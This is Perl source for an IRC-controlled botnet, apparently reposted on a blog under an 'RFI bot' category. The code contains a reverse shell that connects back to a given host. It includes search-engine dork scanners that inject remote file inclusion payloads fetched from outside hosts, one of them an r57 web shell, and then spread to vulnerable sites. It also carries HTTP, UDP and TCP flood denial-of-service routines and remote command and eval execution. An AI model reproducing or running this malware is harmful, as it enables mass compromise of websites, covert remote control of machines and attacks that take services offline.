        #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
        #                                                                                                                      #
        ########################################################################################################################
        ######################
        #   Back Connect     #
        #                    #
        ######################
        if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
          my $host = "$1";
          my $porta = "$2";
          my $proto = getprotobyname('tcp');
          my $iaddr = inet_aton($host);
          my $paddr = sockaddr_in($porta, $iaddr);
          my $shell = "/bin/sh -i";
          if ($^O eq "MSWin32") {
            $shell = "cmd.exe";
          }
          socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
          connect(SOCKET, $paddr) or die "connect: $!";
          open(STDIN, ">&SOCKET");
          open(STDOUT, ">&SOCKET");
          open(STDERR, ">&SOCKET");
          system("$shell");
          close(STDIN);
          close(STDOUT);
          close(STDERR);
          if ($estatisticas)
          {
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4BackConnect12:.4|12 Connecting to 4 $host:$porta");
          }
        }
        ######################
        #End of  Back Connect#
        #                    #
        ######################
        ########################################################################################################################
        # ______   __              ___    _   __    ___          __   __                                                       #
        #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
        # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
        #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
        #                                                                                                                      #
        ########################################################################################################################
        ######################
        #    MULTI SCANNER   #
        #                    #
        ######################
        if ($funcarg =~ /^multiscan\s+(.*?)\s+(.*)/){
        if (my $pid = fork) {
          waitpid($pid, 0);
          } else {
          if (fork) {
            exit;
            } else {
            my $bug=$1;
            my $dork=$2;
            my $contatore=0;
            my ($type,$space);
            my %hosts;
            ### Start Message
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Starting Scan for 4$bug 12$dork");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Initializing on 45 12Search Engines ");
            ### End of Start Message
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:12G4o8o12g9l4e12:.4|412 Started4");
            my @glist=&google($dork);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:2Altavista:.4|412 Started4");
            my @alist=&altavista($dork);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:7All7The7Web:.4|412 Started4");
            my @allist=&alltheweb($dork);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:14A4S14K:.4|412 Started4");
            my @asklist=&ask($dork);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:7AOL:.4|412 Started4");
            my @aollist=&aol($dork);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Results for $dork");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 12G4o8o12g9l4e4 ".scalar(@glist)." 12Sites");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 2Altavista4 ".scalar(@alist)." 12Sites");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 7All7The7Web4 ".scalar(@allist)." 12Sites");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 14A4S14K4 ".scalar(@asklist)." 12Sites");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 7AOL ".scalar(@aollist)." 12Sites");
            push(my @tot, @glist, @ylist, @alist, @allist, @asklist, @aollist);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Total Results4 ".scalar(@tot)." 12Sites");
            my @puliti=&unici(@tot);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Exploiting Started For ".scalar(@puliti)." 12Sites");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Exploiting");
            my $uni=scalar(@puliti);
            foreach my $sito (@puliti)
            {
              $contatore++;
              if ($contatore %30==0){
              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Exploiting4 ".$contatore." 12of4 ".$uni. " 12Sites");
            }
            if ($contatore==$uni-1){
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4| Finished for $bug $dork");
          }
          ### Print CMD and TEST CMD d0nt change the TEST cmd !........###
          my $test="http://".$sito.$bug."http://brant.3x.ro/test.txt?";
          my $print="http://".$sito.$bug."http://www.thiaguinho.net/Scanr0x/r57.txt"."?";
          ### End of Print CMD and TEST CMD d0nt change the TEST cmd !.###
          my $req=HTTP::Request->new(GET=>$test);
          my $ua=LWP::UserAgent->new();
          $ua->timeout(5);
          my $response=$ua->request($req);
          if ($response->is_success) {
            my $re=$response->content;
            if($re =~ /31337/ && $re =~ /uid=/){
            my $hs=geths($print); $hosts{$hs}++;
            if($hosts{$hs}=="1"){
            $x=os($test);
            ($type,$space)=split(/\,/,$x);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Safe Mode = 4OFF12:.4|12 Type: 4$type, 12Free: 4$space, 12Vuln: 4$print ");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Loading spread");
            my $test2="http://".$sito.$bug."http://brant.3x.ro/test.txt?";
            my $reqz=HTTP::Request->new(GET=>$test2);
            my $ua=LWP::UserAgent->new();
            my $response=$ua->request($reqz);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Spread loaded");
            }}
            elsif($re =~ /31337/)
            {
              my $hs=geths($print); $hosts{$hs}++;
              if($hosts{$hs}=="1"){
              $x=os($test);
              ($type,$space)=split(/\,/,$x);
              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Safe Mode = 3ON12:.4|12 Type: 4$type, 12Free: 4$space, 12Vuln: 4$print  ");
              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Loading spread");
              my $test2="http://".$sito.$bug."http://brant.3x.ro/test.txt?";
              my $reqz=HTTP::Request->new(GET=>$test2);
              my $ua=LWP::UserAgent->new();
              my $response=$ua->request($reqz);
              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Spread loaded");
              }}
              }}}
              exit;
              }}}
              ######################
              #End of MultiSCANNER #
              #                    #
              ######################
              ########################################################################################################################
              # ______   __              ___    _   __    ___          __   __                                                       #
              #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
              # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
              #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
              #                                                                                                                      #
              ########################################################################################################################
              ######################
              #    GOOGLESCANNER   #
              #                    #
              ######################
              if ($funcarg =~ /^googlescan\s+(.*?)\s+(.*)/){
              if (my $pid = fork) {
                    waitpid($pid, 0);
                    } else {
                      if (fork) {
                        exit;
                        } else {
                          my $bug=$1;
                          my $dork=$2;
                          my $contatore=0;
                          my ($type,$space);
                          my %hosts;
                              ### Start Message
                              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Starting 12G4o8o12g9l4e12Scan for 4$bug 12$dork");
                              ### End of Start Message       
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:12G4o8o12g9l4e12:.4|412 Started4");
                              my @glist=&google($dork);
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Results for $dork");
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 12G4o8o12g9l4e4 ".scalar(@glist)." 12Sites");
                              push(my @tot, @glist);
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Filtering Cleaned results of 4 ".scalar(@tot)." 12Sites");
                              my @puliti=&unici(@tot);
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Cleaned Results ".scalar(@puliti)." 12Sites");   
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Exploiting Started");
                              my $uni=scalar(@puliti);
                              foreach my $sito (@puliti)
                              {
                              $contatore++;
                              if ($contatore %30==0){
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Exploiting4 ".$contatore." 12of4 ".$uni. " 12Sites");
                              }
                              if ($contatore==$uni-1){
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4| Finished for $bug $dork");
                          }
                              ### Print CMD and TEST CMD d0nt change the TEST cmd !........###
                              my $test="http://".$sito.$bug."http://brant.3x.ro/test.txt?";
                              my $print="http://".$sito.$bug."http://www.thiaguinho.net/Scanr0x/r57.txt"."?";
                              ### End of Print CMD and TEST CMD d0nt change the TEST cmd !.###
                          my $req=HTTP::Request->new(GET=>$test);
                          my $ua=LWP::UserAgent->new();
                              $ua->timeout(5);
                              my $response=$ua->request($req);
                              if ($response->is_success) {
                                my $re=$response->content;
                                if($re =~ /31337/ && $re =~ /uid=/){
                                my $hs=geths($print); $hosts{$hs}++;
                                if($hosts{$hs}=="1"){
                                $x=os($test);
                                ($type,$space)=split(/\,/,$x);
                            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Safe Mode = 4OFF12:.4|12 Type: 4$type, 12Free: 4$space, 12Vuln: 4$print ");
                            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Loading spread");
                                my $test2="http://".$sito.$bug."http://brant.3x.ro/test.txt?";
                                my $reqz=HTTP::Request->new(GET=>$test2);
                                my $ua=LWP::UserAgent->new();
                                my $response=$ua->request($reqz);
                            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Spread loaded");
                                }}
                                elsif($re =~ /31337/)
                                {
                                my $hs=geths($print); $hosts{$hs}++;
                                if($hosts{$hs}=="1"){
                                $x=os($test);
                                ($type,$space)=split(/\,/,$x);
                            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Safe Mode = 3ON12:.4|12 Type: 4$type, 12Free: 4$space, 12Vuln: 4$print  ");
                            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Loading spread");
                                my $test2="http://".$sito.$bug."http://brant.3x.ro/test.txt?";
                                my $reqz=HTTP::Request->new(GET=>$test2);
                                my $ua=LWP::UserAgent->new();
                                my $response=$ua->request($reqz);
                            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Spread12:.4|12 Spread loaded");
                        }}
                        }}}
                        exit;
                        }}   
                        ######################
                        #End of GOOGLESCANNER#
                        #                    #
                        ######################
                        ########################################################################################################################
                        # ______   __              ___    _   __    ___          __   __                                                       #
                        #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
                        # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
                        #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
                        #                                                                                                                      #
                        ########################################################################################################################
                        ######################
                        #     HTTPFlood      #
                        #                    #
                        ######################
                        if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4HTTP DDos12:.4|12 Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds .");
                          my $itime = time;
                          my ($cur_time);
                          $cur_time = time - $itime;
                          while ($2>$cur_time){
                          $cur_time = time - $itime;
                          my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
                          print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
                          close($socket);
                        }
                        sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4HTTP DDos12:.4|12 Attacking done 4 ".$1.".");
                      }
                      ######################
                      #  End of HTTPFlood  #
                      #                    #
                      ######################
                      ########################################################################################################################
                      # ______   __              ___    _   __    ___          __   __                                                       #
                      #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
                      # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
                      #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
                      #                                                                                                                      #
                      ########################################################################################################################
                      ######################
                      #     UDPFlood       #
                      #                    #
                      ######################
                      if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
                        sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4UDP DDos12:.4|12 Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds.");
                        my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
                        $dtime = 1 if $dtime == 0;
                        my %bytes;
                        $bytes{igmp} = $2 * $pacotes{igmp};
                        $bytes{icmp} = $2 * $pacotes{icmp};
                        $bytes{o} = $2 * $pacotes{o};
                        $bytes{udp} = $2 * $pacotes{udp};
                        $bytes{tcp} = $2 * $pacotes{tcp};
                        sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4UDP DDos12:.4|12 12Results4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in4 ".$dtime." 12seconds to4 ".$1.".");
                      }
                      exit;
                    }
                  }
                  ######################
                  #  End of Udpflood   #
                  #                    #
                  ######################


                  sub ircase {
                    my ($kem, $printl, $case) = @_;
                    if ($case =~ /^join (.*)/) {
                      j("$1");
                    }
                    if ($case =~ /^part (.*)/) {
                      p("$1");
                    }
                    if ($case =~ /^rejoin\s+(.*)/) {
                      my $chan = $1;
                      if ($chan =~ /^(\d+) (.*)/) {
                        for (my $ca = 1; $ca <= $1; $ca++ ) {
                          p("$2");
                          j("$2");
                        }
                      }
                      else {
                        p("$chan");
                        j("$chan");
                      }
                    }

                    if ($case =~ /^op/) {
                      op("$printl", "$kem") if $case eq "op";
                      my $oarg = substr($case, 3);
                      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
                    }

                    if ($case =~ /^deop/) {
                      deop("$printl", "$kem") if $case eq "deop";
                      my $oarg = substr($case, 5);
                      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
                    }

                    if ($case =~ /^msg\s+(\S+) (.*)/) {
                      msg("$1", "$2");
                    }

                    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
                      for (my $cf = 1; $cf <= $1; $cf++) {
                        msg("$2", "$3");
                      }
                    }

                    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
                      ctcp("$1", "$2");
                    }

                    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
                      for (my $cf = 1; $cf <= $1; $cf++) {
                        ctcp("$2", "$3");
                      }
                    }

                    if ($case =~ /^nick (.*)/) {
                      nick("$1");
                    }

                    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
                      conectar("$2", "$1", 6667);
                    }

                    if ($case =~ /^raw (.*)/) {
                      sendraw("$1");
                    }

                    if ($case =~ /^eval (.*)/) {
                      eval "$1";
                    }
                  }


                  sub shell {
                    my $printl=$_[0];
                    my $comando=$_[1];
                    if ($comando =~ /cd (.*)/) {
                      chdir("$1") || msg("$printl", "No such file or directory");
                      return;
                    }

                    elsif ($pid = fork) {
                      waitpid($pid, 0);
                    }
                    else {
                      if (fork) {
                        exit;

                        } else {
                        my @resp=`$comando 2>&1 3>&1`;
                        my $c=0;
                        foreach my $linha (@resp) {
                          $c++;
                          chop $linha;
                          sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
                          if ($c == "$linas_max") {
                            $c=0;
                            sleep $sleep;
                          }
                        }
                        exit;
                      }
                    }
                  }

                  sub tcpflooder {
                    my $itime = time;
                    my ($cur_time);
                    my ($ia,$pa,$proto,$j,$l,$t);
                    $ia=inet_aton($_[0]);
                    $pa=sockaddr_in($_[1],$ia);
                    $ftime=$_[2];
                    $proto=getprotobyname('tcp');
                    $j=0;$l=0;
                    $cur_time = time - $itime;
                    while ($l<1000){
                    $cur_time = time - $itime;
                    last if $cur_time >= $ftime;
                    $t="SOCK$l";
                    socket($t,PF_INET,SOCK_STREAM,$proto);
                    connect($t,$pa)||$j--;
                    $j++;$l++;
                  }
                  $l=0;
                  while ($l<1000){
                  $cur_time = time - $itime;
                  last if $cur_time >= $ftime;
                  $t="SOCK$l";
                  shutdown($t,2);
                  $l++;
                }
              }



              sub udpflooder {
                my $iaddr = inet_aton($_[0]);
                my $msg = 'A' x $_[1];
                my $ftime = $_[2];
                my $cp = 0;
                my (%pacotes);
                $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
                socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
                socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
                socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
                socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
                return(undef) if $cp == 4;
                my $itime = time;
                my ($cur_time);
                while ( 1 ) {
                  for (my $porta = 1;
                  $porta <= 65000; $porta++) {
                    $cur_time = time - $itime;
                    last if $cur_time >= $ftime;
                    send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
                    send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
                    send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
                    send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;


                    for (my $pc = 3;
                    $pc <= 255;$pc++) {
                      next if $pc == 6;
                      $cur_time = time - $itime;
                      last if $cur_time >= $ftime;
                      socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
                      send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
                    }
                  }
                  last if $cur_time >= $ftime;
                }
                return($cur_time, %pacotes);
              }

              sub ctcp {
                return unless $#_ == 1;
                sendraw("PRIVMSG $_[0] :\001$_[1]\001");
              }

              sub msg {
                return unless $#_ == 1;
                sendraw("PRIVMSG $_[0] :$_[1]");
              }

              sub notice {
                return unless $#_ == 1;
                sendraw("NOTICE $_[0] :$_[1]");
              }

              sub op {
                return unless $#_ == 1;
                sendraw("MODE $_[0] +o $_[1]");
              }

              sub deop {
                return unless $#_ == 1;
                sendraw("MODE $_[0] -o $_[1]");
              }

              sub j {
                &join(@_);
              }

              sub join {
                return unless $#_ == 0;
                sendraw("JOIN $_[0]");

              }
              sub p { part(@_);
              }

              sub part {
                sendraw("PART $_[0]");
              }

              sub nick {
                return unless $#_ == 0;
                sendraw("NICK $_[0]");
              }

              sub quit {
                sendraw("QUIT :$_[0]");
              }

              sub fetch(){
              my $rnd=(int(rand(9999)));
              my $n= 80;
              if ($rnd<5000) { $n<<=1;}
                my $s= (int(rand(10)) * $n);
                {
                  my @dominios = ("removed-them-all");
                  my @str;
                  foreach $dom  (@dominios)
                  {
                    push (@str,"@gstring");
                  }
                  my $query="www.google.com/search?q=";
                  $query.=$str[(rand(scalar(@str)))];
                  $query.="&num=$n&start=$s";
                  my @lst=();
                  sendraw("privmsg #debug :DEBUG only test googling: ".$query."");
                  my $page = http_query($query);
                  while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"? class=l>/g){
                  if ($1 !~ m/google|cache|translate/){
                  push (@lst,$1);
                }
              }
              return (@lst);
            }

            sub os(){
            my $sito=$_[0];
            my $Res=query($sito);
            my $type;
            my $free;
            my $str;
            while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){
            $type=$1;
          }
          while($Res=~m/<br>Free:(.+?)\<br>/g){
          $free=$1;
        }
        $str=$type.",".$free;
        return $str;
      }

      sub aol(){
      my @lst;
      my $key = $_[0];
      for($b=1;$b<=100;$b++){
      my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
      my $Res=query($AoL);
      while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
      my $k=$1;
      my @grep=links($k);
      push(@lst,@grep);
      }}
      return @lst;
    }

    sub google(){
    my @lst;
    my $key = $_[0];
    for($b=0;$b<=100;$b+=100){
    my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b);
    my $Res=query($Go);
    while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
    if ($1 !~ /google/){
    my $k=$1;
    my @grep=links($k);
    push(@lst,@grep);
    }}}
    return @lst;
  }

  sub altavista(){
  my @lst;
  my $key = $_[0];
  for($b=1;$b<=1000;$b+=10){
  my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
  my $Res=query($AlT);
  while($Res=~m/<span class=ngrn>(.+?)\//g){
  if($1 !~ /altavista/){
  my $k=$1;
  $k=~s/<//g;
  $k=~s/ //g;
  my @grep=links($k);
  push(@lst,@grep);
  }}}
  return @lst;
}

sub ask(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=10)
{
  my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
  my $Res=query($Ask);
  while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
  my $k=$3;
  $k=~s/[\"\ ]//g;
  my @grep=links($k);
  push(@lst,@grep);
  }}
  return @lst;
}

sub alltheweb()
{
  my @lst;
  my $key=$_[0];
  my $i=0;
  my $pg=0;
  for($i=0; $i<=1000; $i+=100)
  {
    my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
    my $Res=query($all);
    while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
    my $k=$1;
    $k=~s/ //g;
    my @grep=links($k);
    push(@lst,@grep);
    }}
    return @lst;
  }

  sub links()
  {
    my @l;
    my $link=$_[0];
    my $host=$_[0];
    my $hdir=$_[0];
    $hdir=~s/(.*)\/[^\/]*$/\1/;
    $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $host.="/";
    $link.="/";
    $hdir.="/";
    $host=~s/\/\//\//g;
    $hdir=~s/\/\//\//g;
    $link=~s/\/\//\//g;
    push(@l,$link,$host,$hdir);
    return @l;
  }

  sub geths(){
  my $host=$_[0];
  $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  return $host;
}

sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}

sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}

sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}  
return @unici;
}

sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
  alarm 10;
  my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  my @r = <$sock>;
  $page="@r";
  alarm 0;
  close($sock);
  };
  return $page;
}
}

########################################################################################################################
# ______   __              ___    _   __    ___          __   __                                                       #
#/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
# / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
#/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
#                                                                                                                      #
############################################################################

'webhxxx > RFI bot' 카테고리의 다른 글

RFI BotNet관련문서  (0) 2010.04.25
vulscan v8  (0) 2010.04.18
FeeLCoMz RFI Scanner Bot v5.3  (0) 2010.04.18
fx29sh 3.3.03.09  (0) 2010.04.18
RFI Bot 재현  (0) 2010.04.18
Posted by applicationlayer
: